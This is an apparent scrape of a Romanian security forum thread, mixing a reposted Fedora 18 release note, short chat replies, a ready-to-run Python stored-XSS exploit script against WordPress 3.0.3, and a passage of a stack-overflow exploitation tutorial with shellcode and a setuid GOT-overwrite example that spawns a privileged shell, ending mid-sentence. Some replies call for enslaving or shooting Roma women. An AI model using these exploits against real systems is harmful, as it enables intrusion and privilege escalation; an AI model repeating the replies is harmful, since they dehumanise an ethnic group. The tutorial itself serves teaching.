https://fedoraproject.org/wiki/Releases/19/Schedule == Feature Deprecation == Fedora has always been full of great features, but sometimes we need to cull the herd. Saying good-bye is always hard, but here are the ones we had to put out to pasture this time around. * /etc/sysconfig Deprecations: Several system configurations have moved out of /etc/sysconfig. The goal of these changes is to reduce - as described in http://0pointer.de/blog/projects/the-new-configuration-fi... - the unnecessary differences between Linux distributions and share a standard location for common settings. For a full list of changes read the release notes. http://docs.fedoraproject.org/en-US/Fedora/18/html/Releas... == Contact information == If you are a journalist or reporter, you can find additional information here: https://fedoraproject.org/wiki/Press Enjoy! -Robyn Bergeron Sursa: Fedora 18 released [LWN.net]
  6. Buna idee, nu trebuie omorati, trebuie facuti sclavi.
  7. Eu oricum nu inteleg. Omul acela oferea 300 RON tigancilor care se castrau. Ce lege a incalcat? De ce e arestat? Ca nu le dadea bon fiscal?
  8. + Oare o stii sa booteze de pe mini-USB?
  9. [h=2]Wordpress 3.0.3 Stored XSS Exploit[/h] #Exploit Title: Wordpress 3.0.3 Stored XSS exploit (IE7,6 NS8.1) [Revised] #Date: 14/01/2013 #Exploit Author: D35m0nd142 #Vendor Homepage: http://wordpress.org #Version: 3.0.3 #Special thanks to Saif #configuration is reconfigurable according to your own parameters. #!/usr/bin/python import sys,os,time,socket os.system("clear") print "-------------------------------------------------" print " Wordpress 3.0.3 Stored XSS exploit " print " Usage : ./exploit.py <wp website> <text> " print " Created by D35m0nd142 " print "-------------------------------------------------\n" time.sleep(1.5) wp_site = sys.argv[1] text = sys.argv[2] try: sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((sys.argv[1],80)) request = "_wpnonce=aad1243dc1&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message% 3D1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http%3A%2F%2F" request += sys.argv[1] request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&_wp_original_http_referer=http%3A%2F%2F" request += sys.argv[1] request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category%5B%5D=0&post_category%5B%5D=1&tax_input%5Bpost_tag%5D=&newtag%5Bpost_tag%5D=&post_title=&samplepermalinknonce=ffcbf222eb&content=%3CIMG+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&excerpt=&trackback_url=&meta%5B108%5D%5Bkey%5D=_edit_last&_ajax_nonce=257f6f6ad9&meta%5B108%5D%5Bvalue%5D=3&meta%5B111%5D%5Bkey%5D=_edit_lock&_ajax_nonce=257f6f6ad9&meta%5B111%5D%5Bvalue%5D=1293465765&meta%5B116%5D%5Bkey%5D=_encloseme&_ajax_nonce=257f6f6ad9&meta%5B116%5D%5Bvalue%5D=1&meta%5B110%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta%5B110%5D%5Bvalue%5D=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145" print "--------------------------------------------------------------------------------------------------------------------------------------" print request print "--------------------------------------------------------------------------------------------------------------------------------------\n" length = len(request) poc = "<IMG STYLE='xss:expression(alert('%s'))'>'" %text print "Trying to execute attack on the remote system . . \nPOC: \n %s\n" %poc time.sleep(0.7) print "Sending %s bytes of data . . " % length time.sleep(2) sock.send("POST /wordpress/wp-admin/post.php HTTP/1.1\r\n") sock.send("Host: " + wp_site+"\r\n") sock.send("User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)\r\n") sock.send("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n") sock.send("Accept-Language: en-us,en;q=0.5\r\n") sock.send("Accept-Encoding: gzip,deflate\r\n") sock.send("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n") sock.send("Keep-Alive: 300\r\n") sock.send("Proxy-Connection: keep-alive\r\n") sock.send("Referer:http://"+wp_site+"/wordpress/wp-admin/post.php?post=145&action=edit&message=1\r\n") #You can change the number of the variable 'post' sock.send("Cookie:wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;wp-settings- time-1=1293196695; wp-settings-time-2=1293197912;wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq\r\n") sock.send("Content-Type: application/x-www-form-urlencoded\r\n") sock.send("Content-Length:%d\n" %length) sock.send(request+"\r\n\r\n") print sock.recv(1024) print "\n[+] Exploit sent with success . Verify manually if the website has been exploited \n" except: print "[!] Error in your configuration or website not vulnerable \n" # 99F5C0A5380593CB 1337day.com [2013-01-15] 06CE9157954A5ED6 # Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  10. 300 RON/femeie? Sunt mai ieftine gloantele.
  11. [h=1]Stack Smashing On A Modern Linux System[/h] Stack Smashing On A Modern Linux System 21 December, 2012 - 06:56 — jip Prerequisites: Basic understanding of C and and x86_64 assembly. +++++++++++++++++++++++++++++++++++++++++++ + Stack Smashing On A Modern Linux System + + jip@soldierx.com + +++++++++++++++++++++++++++++++++++++++++++ [1. Introduction] This tutorial will attempt to show the reader the basics of stack overflows and explain some of the protection mechanisms present in modern linux distributions. For this purpose the latest version of Ubuntu (12.10) has been chosen because it incorporates several security mechanisms by default, and is overall a popular distribution that is easy to install and use. The platform is x86_64. The reader will learn how stack overflows were originally exploited on older systems that did not have these mechanisms in place by default. The individual protections in the latest version of Ubuntu at the time of writing (12.10) will be explained, and a case will be presented in which these are not sufficient to prevent the overflowing of a data structure on the stack that will result in control of the execution path of the program. Although the method of exploitation presented does not resemble the classical method of overflowing (or "smashing") the stack and is in fact closer to the method used for heap overflows or format string bugs (exploiting an arbitrary write), the overflow does happen on the stack in spite of Stack Smashing Protection being used to prevent stack overflows from happening. Now if this does not make sense to you yet, don't worry. I will go into more detail below. [2. System details] An overview of the default security mechanisms deployed in different versions of Ubuntu can be found here: https://wiki.ubuntu.com/Security/Features ----------------------------------- $ uname -srp && cat /etc/lsb-release | grep DESC && gcc --version | grep gcc Linux 3.5.0-19-generic x86_64 DISTRIB_DESCRIPTION="Ubuntu 12.10" gcc (Ubuntu/Linaro 4.7.2-2ubuntu1) 4.7.2 ----------------------------------- [3. The classical stack overflow] Let's go back in time. Life was easy and stack frames were there to be smashed. Sloppy use of data copying methods on the stack could easily result in total control over the program. Not many protection mechanisms had to be taken into account, as demonstrated below. ----------------------------------- $ cat oldskool.c #include <string.h> void go(char *data) { char name[64]; strcpy(name, data); } int main(int argc, char **argv) { go(argv[1]); } ----------------------------------- Before testing, you should disable ASLR system-wide, you can do this as follows: ----------------------------------- $ sudo -i root@laptop:~# echo "0" > /proc/sys/kernel/randomize_va_space root@laptop:~# exit logout ----------------------------------- In very old systems this protection mechanism didn't exist. So for the purpose of this historical example it has been disabled. To disable the other protections, you can compile this example as follows: $ gcc oldskool.c -o oldskool -zexecstack -fno-stack-protector -g Looking at the rest of the example, we see that there is a buffer of 64 bytes allocated on the stack, and that the first argument on the command line is copied into this buffer. The program does not check whether that argument is longer than 64 bytes, allowing strcpy() to keep copying data past the end of the buffer into adjacent memory on the stack. This is known as a stack overflow. Now in order to gain control of execution of the program we are going to use the fact that before entering a function, any c program pushes the address of the instruction it is supposed to execute after completing the function onto the stack. We call this address the return address, or Saved Instruction Pointer. In our example the Saved Instruction Pointer (the address of the instruction that is supposed to be executed after completion of the go() function) is stored next to our name[64] buffer, because of the way the stack works. So if the user can overwrite this return address with any address (supplied via the command line argument), the program will continue executing at this address. An attacker can hijack the flow of execution by copying instructions in their machine code form into the buffer and then pointing the return address to those instructions. When the program is done executing the function, it will continue executing the instructions provided by the attacker. The attacker can now make the program do anything for fun and profit. Enough talk, let me show you. If you don't understand the following commands, you can find a tutorial on how to use gdb here: http://beej.us/guide/bggdb/ ----------------------------------- $ gdb -q ./oldskool Reading symbols from /home/me/.hax/vuln/oldskool...done. (gdb) disas main Dump of assembler code for function main: 0x000000000040053d <+0>: push %rbp 0x000000000040053e <+1>: mov %rsp,%rbp 0x0000000000400541 <+4>: sub $0x10,%rsp 0x0000000000400545 <+8>: mov %edi,-0x4(%rbp) 0x0000000000400548 <+11>: mov %rsi,-0x10(%rbp) 0x000000000040054c <+15>: mov -0x10(%rbp),%rax 0x0000000000400550 <+19>: add $0x8,%rax 0x0000000000400554 <+23>: mov (%rax),%rax 0x0000000000400557 <+26>: mov %rax,%rdi 0x000000000040055a <+29>: callq 0x40051c 0x000000000040055f <+34>: leaveq 0x0000000000400560 <+35>: retq End of assembler dump. (gdb) break *0x40055a Breakpoint 1 at 0x40055a: file oldskool.c, line 11. (gdb) run myname Starting program: /home/me/.hax/vuln/oldskool myname Breakpoint 1, 0x000000000040055a in main (argc=2, argv=0x7fffffffe1c8) 11 go(argv[1]); (gdb) x/i $rip => 0x40055a : callq 0x40051c (gdb) i r rsp rsp 0x7fffffffe0d0 0x7fffffffe0d0 (gdb) si go (data=0xc2 ) at oldskool.c:4 4 void go(char *data) { (gdb) i r rsp rsp 0x7fffffffe0c8 0x7fffffffe0c8 (gdb) x/gx $rsp 0x7fffffffe0c8: 0x000000000040055f ----------------------------------- We set a breakpoint right before the call to go(), at 0x000000000040055a <+29>. Then we run the program with the argument "myname", and it stops before calling go(). We execute one instruction (si) and see that the stack pointer (rsp) now points to a location containing the address right after the callq go instruction at 0x000000000040055f <+34>. This demonstrates exactly what was discussed above. The following output will demonstrate that when the go() function is done, it will execute the "retq" instruction, which will pop this pointer off the stack, and continue execution at whatever address it points to. ----------------------------------- (gdb) disas go Dump of assembler code for function go: => 0x000000000040051c <+0>: push %rbp 0x000000000040051d <+1>: mov %rsp,%rbp 0x0000000000400520 <+4>: sub $0x50,%rsp 0x0000000000400524 <+8>: mov %rdi,-0x48(%rbp) 0x0000000000400528 <+12>: mov -0x48(%rbp),%rdx 0x000000000040052c <+16>: lea -0x40(%rbp),%rax 0x0000000000400530 <+20>: mov %rdx,%rsi 0x0000000000400533 <+23>: mov %rax,%rdi 0x0000000000400536 <+26>: callq 0x4003f0 0x000000000040053b <+31>: leaveq 0x000000000040053c <+32>: retq End of assembler dump. (gdb) break *0x40053c Breakpoint 2 at 0x40053c: file oldskool.c, line 8. (gdb) continue Continuing. Breakpoint 2, 0x000000000040053c in go (data=0x7fffffffe4b4 "myname") 8 } (gdb) x/i $rip => 0x40053c : retq (gdb) x/gx $rsp 0x7fffffffe0c8: 0x000000000040055f (gdb) si main (argc=2, argv=0x7fffffffe1c8) at oldskool.c:12 12 } (gdb) x/gx $rsp 0x7fffffffe0d0: 0x00007fffffffe1c8 (gdb) x/i $rip => 0x40055f : leaveq (gdb) quit ----------------------------------- We set a breakpoint right before the go() function returns and continue execution. The program stops right before executing the "retq" instruction. We see that the stack pointer (rsp) still points to the address inside of main that the program is supposed to jump to after finishing the execution of go(). The retq instruction is executed, and we see that the program has indeed popped the return address off the stack and has jumped to it. Now we are going to overwrite this address by supplying more than 32 bytes of data, using perl: ----------------------------------- $ gdb -q ./oldskool Reading symbols from /home/me/.hax/vuln/oldskool...done. (gdb) run `perl -e 'print "A"x48'` Starting program: /home/me/.hax/vuln/oldskool `perl -e 'print "A"x48'` Program received signal SIGSEGV, Segmentation fault. 0x000000000040059c in go (data=0x7fffffffe49a 'A' ) 12 } (gdb) x/i $rip => 0x40059c : retq (gdb) x/gx $rsp 0x7fffffffe0a8: 0x4141414141414141 ----------------------------------- We use perl to print a string of 80 x "A" on the command line, and pass that as an argument to our example program. We see that the program crashes when it tries to execute the "retq" instruction inside the go() function, since it tries to jump to the return address which we have overwritten with "A"s (0x41). Note that we have to write 80 bytes (64 + 8 + 8 ) because pointers are 8 bytes long on 64 bit machines, and there is actually another stored pointer between our name buffer and the Saved Instruction Pointer. Okay, so now we can redirect the execution path to any location we want. How can we use this to make the program do our bidding? If we place our own machine code instructions inside the name[] buffer and then overwrite the return address with the address of the beginning of this buffer, the program will continue executing our instructions (or "shellcode") after it's done executing the go function. So we need to create a shellcode, and we need to know the address of the name[] buffer so we know what to overwrite the return address with. I will not go into creating shellcode as this is a little bit outside the scope of this tutorial, but will instead provide you with a shellcode that prints a message to the screen. We can determine the address of the name[] buffer like this: ----------------------------------- (gdb) p &name $2 = (char [32]) 0x7fffffffe0a0 ----------------------------------- We can use perl to print unprintable characters to the command line, by escaping them like this: "\x41". Furthermore, because of the way little-endian machines store integers and pointers, we have to reverse the order of the bytes. So the value we will use to overwrite the Saved Instruction Pointer will be: "\xa0\xe0\xff\xff\xff\x7f" This is the shellcode that will print our message to the screen and then exit: "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48 \x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9 \xff\xff\xff\x48\x61\x78\x21" Note that these are just instructions in machine code form, escaped so that they are printable with perl. Because the shellcode is 45 bytes long, and we need to provide 72 bytes of data before we can overwrite the SIP, we have to add 27 bytes as padding. So the string we use to own the program looks like this: "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff\xc7\x5e\x48 \x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd9 \xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xa0\xe0\xff\xff\xff\x7f" The program will jump to 0x7fffffffe0a0 when it is done executing the function go(). This is where the name[] buffer is located, which we have filled with our machine code. It should then execute our machine code to print our message and exit the program. Let's try it (note that you should remove all line breaks when you try to reproduce this): ----------------------------------- $ ./oldskool `perl -e 'print "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48 \xff\xc0\x48\xff\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c \x48\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21" . "A"x27 . "\xa0\xe0 \xff\xff\xff\x7f"'` Hax!$ ----------------------------------- It worked! Our important message has been delivered, and the process has exit. [4. Protection mechanisms] Welcome back to 2012. The example above does not work anymore on so many levels. There are a lot of different protection mechanisms in place today on our ubuntu system, and this particular type of vulnerability does not even exist in this form anymore. There are still overflows that can happen on the stack though, and there are still ways of exploiting them. That is what I want to show you in this section, but first let's look at the different protection schemes. [4.1 Stack Smashing Protection] In the first example, we used the -fno-stack-protector flag to indicate to gcc that we did not want to compile with stack smashing protection. What happens if we leave this out, along with the other flags we passed earlier? Note that at this point ASLR is back on and so everything is set to their defaults. $ gcc oldskool.c -o oldskool -g Let's look at the binary with gdb for a minute and see what's going on. ----------------------------------- $ gdb -q ./oldskool Reading symbols from /home/me/.hax/vuln/oldskool...done. (gdb) disas go Dump of assembler code for function go: 0x000000000040058c <+0>: push %rbp 0x000000000040058d <+1>: mov %rsp,%rbp 0x0000000000400590 <+4>: sub $0x60,%rsp 0x0000000000400594 <+8>: mov %rdi,-0x58(%rbp) 0x0000000000400598 <+12>: mov %fs:0x28,%rax 0x00000000004005a1 <+21>: mov %rax,-0x8(%rbp) 0x00000000004005a5 <+25>: xor %eax,%eax 0x00000000004005a7 <+27>: mov -0x58(%rbp),%rdx 0x00000000004005ab <+31>: lea -0x50(%rbp),%rax 0x00000000004005af <+35>: mov %rdx,%rsi 0x00000000004005b2 <+38>: mov %rax,%rdi 0x00000000004005b5 <+41>: callq 0x400450 0x00000000004005ba <+46>: mov -0x8(%rbp),%rax 0x00000000004005be <+50>: xor %fs:0x28,%rax 0x00000000004005c7 <+59>: je 0x4005ce 0x00000000004005c9 <+61>: callq 0x400460 <__stack_chk_fail@plt> 0x00000000004005ce <+66>: leaveq 0x00000000004005cf <+67>: retq End of assembler dump. ----------------------------------- If we look at go+12 and go+21, we see that a value is taken from $fs+0x28, or %fs:0x28. What exactly this address points to is not very important, for now I will just say fs points to structures maintained by the kernel, and we can't actually inspect the value of fs using gdb. What is more important to us is that this location contains a random value that we cannot predict, as demonstrated: ----------------------------------- (gdb) break *0x0000000000400598 Breakpoint 1 at 0x400598: file oldskool.c, line 4. (gdb) run Starting program: /home/me/.hax/vuln/oldskool Breakpoint 1, go (data=0x0) at oldskool.c:4 4 void go(char *data) { (gdb) x/i $rip => 0x400598 : mov %fs:0x28,%rax (gdb) si 0x00000000004005a1 4 void go(char *data) { (gdb) i r rax rax 0x110279462f20d000 1225675390943547392 (gdb) run The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/me/.hax/vuln/oldskool Breakpoint 1, go (data=0x0) at oldskool.c:4 4 void go(char *data) { (gdb) si 0x00000000004005a1 4 void go(char *data) { (gdb) i r rax rax 0x21f95d1abb2a0800 2448090241843202048 ----------------------------------- We break right before the instruction that moves the value from $fs+0x28 into rax and execute it, inspect rax and repeat the whole process and see clearly that the value changed between runs. So this is a value that is different every time the program runs, which means that an attacker can't reliably predict it. So how is this value used to protect the stack? If we look at go+21 we see that the value is copied onto the stack, at location -0x8(%rbp). If we look at the prologue to deduct what that points at, we see that this random value is right in between the function's local variables and the saved instruction pointer. This is called a "canary" value, referring to the canaries miners use to alert them whenever a gas leak is going on, since the canaries would die way before any human is in danger. Much like that situation, when a stack overflow occurs, the canary value would be the first to die, before the saved instruction pointer could be overwritten. If we look at go+46 and go+50, we see that the value is read from the stack and compared to the original value. If they are equal, the canary has not been changed and thus the saved instruction pointer hasn't been altered either, allowing the function to return safely. If the value has been changed, a stack overflow has occured and the saved instruction pointer may have been compromised. Since it's not safe to return, the function instead calls the __stack_chk_fail function. This function does some magic, throws an error and eventually exits the process. This is what that looks like: ----------------------------------- $ ./oldskool `perl -e 'print "A"x80'` *** stack smashing detected ***: ./oldskool terminated Aborted (core dumped) ----------------------------------- So to recap, the buffer is overflowed, and data is copied over the canary value and over the saved instruction pointer. However, before attempting to return to this overwritten SIP, the program detects that the canary has been tampered with and exits safely before doing the attackers bidding. Now the bad news is that there is not really a good way around this situation for the attacker. You might think about bruteforcing the stack canary, but in this case it would be different for every run, so you would have to be extremely lucky to hit the right value. It would take some time and would not be very stealthy either. The good news is that there are plenty of situations in which this is not sufficient to prevent exploitation. For example, stack canaries are only used to protect the SIP and not to protect application variables. This could lead to other exploitable situations, as shown later. The oldskool method of "smashing" the stack frame to trick the program into returning to our code is effectively killed by this protection mechanism though; it is no longer viable. [4.2 NX: non-executable memory] Now you might have noticed we did not just skip the -fno-stack-protector flag this time, but we also left out the -zexecstack flag. This flag told the system to allow us to execute instructions stored on the stack. Modern systems do not allow for this to happen, by either marking memory as writable for data, or executable for instructions. No region of memory will be both writable and executable at the same time. If you think about this, this means that the we have no way of storing shellcode in memory that the program could later execute. Since we cannot write to the executable sections of memory and the program can't execute instructions located in the writable sections of memory, we will need some other way to trick the program into doing what we want. The answer is ROP, or Return-Oriented Programming. The trick here is to use parts of code that are already in the program itself, thus located in the executable .text section of the binary, and chain them together in a way so that they will resemble our old shellcode. I will not go too deeply into this subject, but I will show you an example at the end of this tutorial. Let me finish by demonstrating that a program will fail when trying to execute instructions from the stack: ----------------------------------- $ cat nx.c int main(int argc, char **argv) { char shellcode[] = "\xeb\x22\x48\x31\xc0\x48\x31\xff\x48\x31\xd2\x48\xff\xc0\x48\xff" "\xc7\x5e\x48\x83\xc2\x04\x0f\x05\x48\x31\xc0\x48\x83\xc0\x3c\x48" "\x31\xff\x0f\x05\xe8\xd9\xff\xff\xff\x48\x61\x78\x21"; void (*func)() = (void *)shellcode; func(); } $ gcc nx.c -o nx -zexecstack $ ./nx Hax!$ $ gcc nx.c -o nx $ ./nx Segmentation fault (core dumped) ----------------------------------- We placed our shellcode from earlier in a buffer on the stack, and set a function pointer to point to that buffer before calling it. When we compile with the -zexecstack like before, the code can be executed on the stack. But without the flag, the stack is marked as non executable by default, and the program will fail with a segmentation fault. [4.3 ASLR: Address Space Layout Randomization] The last thing we disabled when trying out the classic stack overflow example was ASLR, by executing echo "0" > /proc/sys/kernel/randomize_va_space as root. ASLR makes sure that every time the program is loaded, it's libraries and memory regions are mapped at random locations in virtual memory. This means that when running the program twice, buffers on the stack will have different addresses between runs. This means that we cannot simply use a static address pointing to the stack that we happened to find by using gdb, because these addresses will not be correct the next time the program is run. Note that gdb will disable ASLR when debugging a program, and we can enable it inside gdb for a more realistic view of what's going on as shown below (output is trimmed on the right, the addresses are what's important here): ----------------------------------- $ gdb -q ./oldskool Reading symbols from /home/me/.hax/vuln/oldskool...done. (gdb) set disable-randomization off (gdb) break main Breakpoint 1 at 0x4005df: file oldskool.c, line 11. (gdb) run Starting program: /home/me/.hax/vuln/oldskool Breakpoint 1, main (argc=1, argv=0x7fffe22fe188) at oldskool.c:11 11 go(argv[1]); (gdb) i proc map process 6988 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x401000 0x1000 0x0 /home/me/.hax/vuln 0x600000 0x601000 0x1000 0x0 /home/me/.hax/vuln 0x601000 0x602000 0x1000 0x1000 /home/me/.hax/vuln 0x7f0e120ef000 0x7f0e122a4000 0x1b5000 0x0 /lib/x86_64-linux- 0x7f0e122a4000 0x7f0e124a3000 0x1ff000 0x1b5000 /lib/x86_64-linux- 0x7f0e124a3000 0x7f0e124a7000 0x4000 0x1b4000 /lib/x86_64-linux- 0x7f0e124a7000 0x7f0e124a9000 0x2000 0x1b8000 /lib/x86_64-linux- 0x7f0e124a9000 0x7f0e124ae000 0x5000 0x0 0x7f0e124ae000 0x7f0e124d0000 0x22000 0x0 /lib/x86_64-linux- 0x7f0e126ae000 0x7f0e126b1000 0x3000 0x0 0x7f0e126ce000 0x7f0e126d0000 0x2000 0x0 0x7f0e126d0000 0x7f0e126d1000 0x1000 0x22000 /lib/x86_64-linux- 0x7f0e126d1000 0x7f0e126d3000 0x2000 0x23000 /lib/x86_64-linux- 0x7fffe22df000 0x7fffe2300000 0x21000 0x0 [stack] 0x7fffe23c2000 0x7fffe23c3000 0x1000 0x0 [vdso] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (gdb) run The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/me/.hax/vuln/oldskool Breakpoint 1, main (argc=1, argv=0x7fff7e16cfd8) at oldskool.c:11 11 go(argv[1]); (gdb) i proc map process 6991 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x401000 0x1000 0x0 /home/me/.hax/vuln 0x600000 0x601000 0x1000 0x0 /home/me/.hax/vuln 0x601000 0x602000 0x1000 0x1000 /home/me/.hax/vuln 0x7fdbb2753000 0x7fdbb2908000 0x1b5000 0x0 /lib/x86_64-linux- 0x7fdbb2908000 0x7fdbb2b07000 0x1ff000 0x1b5000 /lib/x86_64-linux- 0x7fdbb2b07000 0x7fdbb2b0b000 0x4000 0x1b4000 /lib/x86_64-linux- 0x7fdbb2b0b000 0x7fdbb2b0d000 0x2000 0x1b8000 /lib/x86_64-linux- 0x7fdbb2b0d000 0x7fdbb2b12000 0x5000 0x0 0x7fdbb2b12000 0x7fdbb2b34000 0x22000 0x0 /lib/x86_64-linux- 0x7fdbb2d12000 0x7fdbb2d15000 0x3000 0x0 0x7fdbb2d32000 0x7fdbb2d34000 0x2000 0x0 0x7fdbb2d34000 0x7fdbb2d35000 0x1000 0x22000 /lib/x86_64-linux- 0x7fdbb2d35000 0x7fdbb2d37000 0x2000 0x23000 /lib/x86_64-linux- 0x7fff7e14d000 0x7fff7e16e000 0x21000 0x0 [stack] 0x7fff7e1bd000 0x7fff7e1be000 0x1000 0x0 [vdso] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] ----------------------------------- We set "disable-randomization" to "off", we run the program twice and inspect the mappings to see that most of them have different addresses. Indeed, not all of them do, and this is the key to succesful exploitation with ASLR enabled. [5. Modern stack overflow] So, even with all these protection mechanisms in place, sometimes there is room for an overflow. And sometimes that overflow leads to successful exploitation. I showed you how the stack canary protects the stack frame from being messed up and the SIP from being overwritten by copying past the end of a local buffer. But the stack canaries are only placed before the SIP, not between variables located on the stack. So it is still possible for a variable on the stack to be overwritten in the same fashion as the SIP was overwritten in our first example. This can lead to a lot of different problems, in some cases we can simply overwrite a function pointer that is called at some point. In some other cases we can overwrite a pointer that is later used to write or read data, and thus control this read or write. This is what I am going to show you. By overflowing a buffer on the stack and overwriting a pointer on the stack that is later used to write user-supplied data, the attacker can write data to an arbitrary location. A situation like this can often be exploited to gain control of execution. Here is the source code of the example vulnerability: ----------------------------------- $ cat stackvuln.c #include <stdio.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #define MAX_SIZE 48 #define BUF_SIZE 64 char data1[BUF_SIZE], data2[BUF_SIZE]; struct item { char data[MAX_SIZE]; void *next; }; int go(void) { struct item item1, item2; item1.next = &item2; item2.next = &item1; memcpy(item1.data, data1, BUF_SIZE); // Whoops, did we mean MAX_SIZE? memcpy(item1.next, data2, MAX_SIZE); // Yes, yes we did. exit(-1); // Exit in shame. } void hax(void) { execl("/bin/bash", "/bin/bash", "-p", NULL); } void readfile(char *filename, char *buffer, int len) { FILE *fp; fp = fopen(filename, "r"); if (fp != NULL) { fread(buffer, 1, len, fp); fclose(fp); } } int main(int argc, char **argv) { readfile("data1.dat", data1, BUF_SIZE); readfile("data2.dat", data2, BUF_SIZE); go(); } $ gcc stackvuln.c -o stackvuln $ sudo chown root:root stackvuln $ sudo chmod +s ./stackvuln ----------------------------------- For the purpose of this example, I have included the "hax()" function which is obviously where we want to redirect execution to. Originally I wanted to include an example using a ROP chain to call a function like system(), but I decided not to for two reasons: it is perhaps a little bit out of scope for this tutorial and I think it would make this tutorial too hard to follow for beginners, besides that it was quite hard to find good gadgets in a program this small. The use of this function does illustrate the point that because of NX, we can't push our own shellcode onto the stack and execute it, but we have to reuse code that is in the program already (be it a function, or a chain of ROP gadgets). Google ROP exploitation if you are interested in the real deal. Our overflow happens in the go() function. It creates a circular list with two items of the 'struct item' type. The first memcpy accidentally copies too many bytes into the structure, allowing us to overwrite the "next" pointer which is used to write to in the second call. So, if we can overwrite the next pointer with an address of our choice, we can control where memcpy writes to. Besides, we also control data1 and data2, because these buffers are read from a file. This data could've come from a network connection or some other input, but I chose to use files because it allows us to easily alter the payloads for demonstration purposes. So, we can write any 48 bytes we want, to any location we want. How can we use this to gain control of the program? We are going to use a structure called the GOT/PLT. I will try to explain quickly what it is, but if you need more information there is a lot of it on the web. The .got.plt is a table of addresses that a binary uses to keep track of the location of functions that are in a library. As I explained before, ASLR makes sure that a library is mapped to a different virtual memory address every time the program runs. So the program can't use static absolute addresses to refer to functions inside these libraries, because these addresses would change every run. So, the short version is, it uses a mechanism that calls a stub to calculate the real address of the function, store it in a table, and use that for future reference. So every time the function is called, the address inside this table (.got.plt) is used. We can abuse this by overwriting this address, so that the next time the program thinks it's calling the function that corresponds with that particular entry, it will be redirected to an instruction of our choice, much like the redirection we used before by overwriting the return pointer. If we look at our example, we see that exit() is called right after the calls to memcpy(). So, if we can use the arbitrary write provided by those calls to overwrite the .got.plt entry of exit(), the program will jump to the address we provided instead of the address of exit() inside libc. Which address will we use? You guessed it, the address of hax(). First, let me show you how the .got.plt is used when exit() is called: ----------------------------------- $ cat exit.c #include <stdlib.h> int main(int argc, char **argv) { exit(0); } $ gcc exit.c -o exit -g $ gdb -q ./exit Reading symbols from /home/me/.hax/plt/exit...done. (gdb) disas main Dump of assembler code for function main: 0x000000000040051c <+0>: push %rbp 0x000000000040051d <+1>: mov %rsp,%rbp 0x0000000000400520 <+4>: sub $0x10,%rsp 0x0000000000400524 <+8>: mov %edi,-0x4(%rbp) 0x0000000000400527 <+11>: mov %rsi,-0x10(%rbp) 0x000000000040052b <+15>: mov $0x0,%edi 0x0000000000400530 <+20>: callq 0x400400 End of assembler dump. (gdb) x/i 0x400400 0x400400 : jmpq *0x200c1a(%rip) # 0x601020 (gdb) x/gx 0x601020 0x601020 : 0x0000000000400406 ----------------------------------- We see at main+20 that instead of calling exit inside libc directly, 0x400400 is called, which is a stub inside the plt. It jumps to whatever address is located at 0x601020, inside the got.plt. Now in this case this is an address back inside the stub again, which resolves the address of the function inside libc, and replaces the entry in 0x601020 with the real address of exit. So whenever exit is called, the address 0x601020 is used regardless of whether the real address has been resolved yet or not. So, we need to overwrite this location with the address of the hax() function, and the program will execute that function instead of exit(). So for our example vulnerability, we need to locate where the entry to exit is inside the .got.plt, overwrite the pointer in the structure with this address, and then fill the data2 buffer with the pointer to the hax() function. The first call will then overwrite the item1.next pointer with the pointer to the exit entry inside 